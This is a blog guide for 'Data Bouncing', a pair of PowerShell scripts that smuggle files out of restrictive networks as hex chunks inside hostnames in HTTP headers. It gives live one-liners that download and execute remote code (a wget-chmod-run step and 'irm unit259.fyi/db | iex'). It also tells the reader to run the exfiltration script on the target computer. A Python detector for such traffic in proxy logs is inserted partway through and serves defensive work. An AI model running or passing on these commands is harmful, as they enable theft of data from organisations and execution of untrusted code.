Data Bouncing With Jakoby

  • @site.url: https://databouncing.io
  • path: /data-bouncing-with-jakoby/
  • excerpt: Data Bouncing - PowerShell Version via Jakoby (Unit-259) - this version uses Hex in the hostname and defaults to a public interactsh (so you don't need your own DNS listener)
  • published date:
  • reading time: 2 minutes
  • tag: Guides
  • authors: JC

Jakoby (https://t.co/5G3vwgbJZv) engaged and whipped up some DataBouncing PowerShell capabilities that you can enjoy in minutes.

GitHub - Unit-259/DataBouncing

The project consists of two main scripts:

  • nightCrawler.ps1: Manages data exfiltration.
  • deadPool.ps1: Handles reassembly of the exfiltrated data.

nightCrawler.ps1

This script encodes a file into hexadecimal chunks and sends each chunk as part of a domain name in an HTTP request header. It's used for exfiltrating data from restrictive networks.

deadPool.ps1

This script processes data received from nightCrawler.ps1: it finds patterns in the logs, assembles the data chunks, and converts them back to their original form.
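Because each chunk travels as a hex string inside a hostname in a request header, the pattern matching that deadPool.ps1 applies to listener logs can also be run by defenders over their own egress proxy logs. The following Python is an added example, not code from the Unit-259 project; it flags any client that sends several distinct long hex labels under one parent domain. The JSON log layout, the X-Example-Header name, the .example hostnames and the length and count thresholds are all assumptions.

```python
import json
import re
from collections import defaultdict

HOSTNAME = re.compile(r"\b(?:[a-z0-9-]{1,63}\.)+[a-z]{2,}\b", re.I)
# 16 is an assumed floor for "long" hex; 63 is the DNS label length limit.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")

# Constructed proxy log, one JSON record per request. The field names, the
# X-Example-Header name and every hostname are made up for this example.
_HEX = ["00112233445566778899aabbccddeeff",
        "0123456789abcdef0123456789abcdef",
        "fedcba9876543210fedcba9876543210"]
SAMPLE_LOG = "\n".join(
    ['{"client": "10.0.0.5", "headers": {"Host": "www.example.com"}}',
     # One hashed asset hostname: hex-looking, but a single label, so benign.
     '{"client": "10.0.0.5", "headers": {"Host": "www.example.com", "Referer": '
     '"https://d41d8cd98f00b204e9800998ecf8427e.cdn.example/app.js"}}',
     'not json']
    + [json.dumps({"client": "10.0.0.7", "headers": {
          "Host": "www.example.com",
          "X-Example-Header": f"{h}.c0ffee01.oast.example"}})
       for h in _HEX + _HEX[:1]])  # last record repeats a chunk (retry)


def hex_labels(hostname):
    """Return (hex-looking labels, naive two-label parent domain)."""
    labels = hostname.lower().split(".")
    return [l for l in labels[:-2] if HEX_LABEL.match(l)], ".".join(labels[-2:])


def find_suspects(log_text, min_distinct=3):
    """Map (client, parent) -> stats where many distinct hex labels were sent."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        try:
            rec = json.loads(line)
            client, values = rec["client"], list(rec["headers"].values())
        except (ValueError, KeyError, TypeError, AttributeError):
            continue  # skip malformed records instead of aborting the hunt
        for value in values:
            for host in HOSTNAME.findall(str(value)):
                found, parent = hex_labels(host)
                seen[(client, parent)].update(found)
    return {key: {"distinct_labels": len(v), "approx_bytes": sum(map(len, v)) // 2}
            for key, v in seen.items() if len(v) >= min_distinct}


if __name__ == "__main__":
    for key, stats in find_suspects(SAMPLE_LOG).items():
        print(key, stats)
```

The two-label parent is a simplification; a public-suffix list gives correct grouping for multi-part TLDs. Seeing request headers at all assumes a TLS-inspecting proxy or endpoint telemetry.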

Usage

Prerequisites

  • A controlled DNS server.
  • For hobbyists, InteractSh is recommended.

Setting Up

  1. Listener Setup: Use InteractSh Web Client or the Build Script with Ubuntu 22.04. You can use this single one-liner to download, install, and run InteractSh on your server:

wget "https://unit259.fyi/interactshbuild" && chmod +x interactshbuild && ./interactshbuild

Start the InteractSh Client on your listener machine:

  2. Target Machine Preparation: Prepare your data to be exfiltrated. Run this nightCrawler.ps1 script on the target computer.

Running the Scripts

  1. Data Exfiltration with nightCrawler.ps1: Running irm unit259.fyi/db | iex will quickly load it on their system. You have the option of using our GUI as well. The following one-liner will open it on any PC for you instantly: irm unit259.fyi/dbgui | iex
    • Provide the URL for the OOB listener
    • Provide the file path of the target exfil data
  2. Data Reconstruction with deadPool.ps1:
    • Run it

Notes

  • Remember to replace placeholders like 'your-regex', 'your-domain.oast.online', etc., with actual values relevant to your setup.
  • The scripts are part of a PoC and should be used responsibly.

Jakoby can be found in a handful of places (https://my.link.gallery/iamjakoby). Be polite, love cats, and I'm sure he'll share some of his time.